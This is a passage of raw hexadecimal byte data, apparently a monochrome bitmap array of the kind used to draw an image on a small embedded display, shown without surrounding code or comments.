0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0X80,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFE,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X03,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFE,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X01,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XC0,
0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF8,0X07,0XFF,0XFF,0XFF,0XFF,0XC0,0X0F,0XFE,0X3F,0XFF,0XFC,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0X80,
0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XE0,0X07,0XFF,0XFF,0XFF,0XF8,0X00,0X0F,0XFE,0X3F,0XFF,0XFC,0X00,
0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0X80,
0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0X80,0X07,0XFF,0XFF,0XFF,0XC0,0X00,0X0F,0XFE,0X3F,0XFF,0XFC,0X00,
0X01,0XFF,0XFF,0XFF,0XF0,0X7F,0XF0,0X7F,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0X9F,0XFF,0XFE,0X0F,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0X80,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,0XFF,0X00,0X00,0X0F,0XFE,0X3F,0XFF,0XFC,0X00,
0X00,0XFF,0XFF,0XFF,0X80,0X1F,0XC0,0X1F,0XFF,0XFF,0XFF,0XFC,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0X07,0XFF,0XFE,0X0F,0XFF,0XFC,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0X80,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFC,0X00,0X07,0XFF,0XFF,0XFC,0X00,0X00,0X0F,0XFE,0X3F,0XFF,0XFC,0X00,
0X00,0X7F,0XFF,0XFF,0X00,0X1F,0X80,0X0F,0XFF,0XFF,0XFF,0XF8,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0X03,0XFF,0XFE,0X0F,0XFF,0XF8,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XF0,0X00,0X07,0XFF,0XFF,0XF8,0X00,0X00,0X0F,0XFE,0X3F,0XFF,0XFC,0X01,
0X80,0X3F,0XFF,0XFF,0X0F,0X0F,0X07,0X0F,0XFC,0X7F,0XFF,0XF0,0X06,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0X01,0XFF,0XFE,0X1F,0XFF,0XF0,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0X00,
0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XC0,0X00,0X07,0XFF,0XFF,0XF0,0X00,0X00,0X0F,0XFE,0X3F,0XFF,0XFC,0X01,
0XC0,0X0F,0XFF,0XFE,0X1F,0X8F,0X0F,0X87,0XFC,0X7F,0XFF,0XC0,0X0E,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0X80,0XFF,0XFF,0X3F,0XFF,0XE0,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0X00,
0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0X00,0X00,0X07,0XFF,0XFF,0XE0,0X00,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XE0,0X07,0XFF,0XFE,0X1F,0X87,0X1F,0XC7,0XFC,0X7F,0XFF,0X80,0X1E,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XC0,0X7F,0XFF,0XFF,0XFF,0XC0,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFE,0X01,
0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFE,0X00,0X00,0X07,0XFF,0XFF,0XE0,0X07,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XF0,0X03,0XFF,0XFE,0X1F,0X87,0X1F,0XC7,0XFC,0X7F,0XFF,0X00,0X7E,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XE0,0X3F,0XFF,0XFF,0XFF,0X80,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFE,0X01,
0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0X00,0X10,0X07,0XFF,0XFF,0XC0,0X0F,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XF8,0X01,0XFF,0XFE,0X1F,0X87,0X1F,0XC7,0XFC,0X7F,0XFE,0X00,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XF0,0X1F,0XFF,0XFF,0XFF,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFE,0X01,
0X00,0X7F,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0XFF,0X00,0X00,0X00,0X7F,0XFF,0XFF,0XFF,
0XFF,0XFF,0X00,0X30,0X07,0XFF,0XFF,0X80,0X1F,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XFE,0X00,0X7F,0XFE,0X0F,0X87,0X0F,0X87,0XFC,0X7F,0XF8,0X01,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XF8,0X1F,0XFC,0X07,0XFE,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X03,
0X80,0X7F,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0XFC,0X00,0X00,0X00,0X7F,0XFF,0XFF,0XFF,
0XFF,0XFF,0X80,0XF0,0X07,0XFF,0XFF,0X80,0X3F,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0X00,0X3F,0XFF,0X00,0X07,0X00,0X07,0X00,0X03,0XF0,0X03,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFC,0X0F,0XC0,0X00,0XFE,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XF0,0X0F,0XFF,0XFE,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X03,
0X80,0X7F,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0XF8,0X00,0X00,0X00,0X7F,0XFF,0XFF,0XFF,
0XFF,0XFF,0X83,0XF0,0X07,0XFF,0XFF,0X80,0X7F,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0X80,0X1F,0XFF,0X80,0X07,0X80,0X07,0X00,0X03,0XE0,0X07,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X1F,0X00,0X00,0X3E,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XC0,0X03,0XFF,0XFE,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X03,
0X80,0X3F,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0XF0,0X00,0X00,0X00,0X7F,0XFF,0XFF,0XFF,
0XFF,0XFF,0X8F,0XF0,0X07,0XFF,0XFF,0X00,0X7F,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XC0,0X0F,0XFF,0XE0,0X87,0XE0,0XC7,0X00,0X03,0XC0,0X0F,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X3E,0X00,0X00,0X0F,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0X00,0X01,0XFF,0XFE,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X07,
0X80,0X3F,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0XE0,0X00,0X00,0X00,0X7F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XDF,0XF0,0X07,0XFF,0XFF,0X00,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XF0,0X07,0XFF,0XFF,0X8F,0XFF,0XC7,0XFC,0X7F,0X80,0X3F,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X00,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,
0X00,0X00,0XFF,0XFE,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XF8,0X07,
0XC0,0X3F,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0XE0,0X0F,0XC0,0X00,0X7F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFF,0X00,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XF8,0X01,0XFF,0XFF,0X8F,0XFF,0X87,0XFC,0X7E,0X00,0X7F,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X00,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,
0X00,0X00,0X7F,0XFE,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XF8,0X07,
0XC0,0X1F,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0XC0,0X1F,0XF0,0X0F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFC,0X00,0XFF,0XFF,0X0F,0XFF,0X0F,0XFC,0X7C,0X00,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X00,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,
0X0F,0XE0,0X7F,0XFE,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XF8,0X07,
0XC0,0X1F,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0XC0,0X3F,0XF8,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0XF8,0X07,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFE,0X00,0X7F,0XFE,0X1F,0XFE,0X0F,0XFC,0X78,0X01,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,
0X3F,0XF0,0X3F,0XFE,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XF0,0X0F,
0XC0,0X1F,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0X80,0X7F,0XF8,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0X80,0X00,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0X80,0X3F,0X00,0X3F,0X80,0X1F,0XFC,0X70,0X07,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X00,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,
0X7F,0XF8,0X3F,0XFE,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XF0,0X0F,
0XE0,0X1F,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0X80,0X7F,0XF8,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0X00,0X00,0X3F,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XC0,0X0F,0X00,0X7F,0X80,0X3F,0XFC,0X40,0X0F,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF8,0X3F,0XFE,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XF0,0X0F,
0XE0,0X0F,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0X80,0X7F,0XFC,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0X00,0X00,0X0F,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XE0,0X07,0X03,0XFF,0X81,0XFF,0XFF,0X80,0X1F,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF8,0X3F,0XFE,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XF0,0X0F,
0XE0,0X0F,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0X80,0X7F,0XFC,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0X00,0X00,0X07,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XF0,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X3F,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
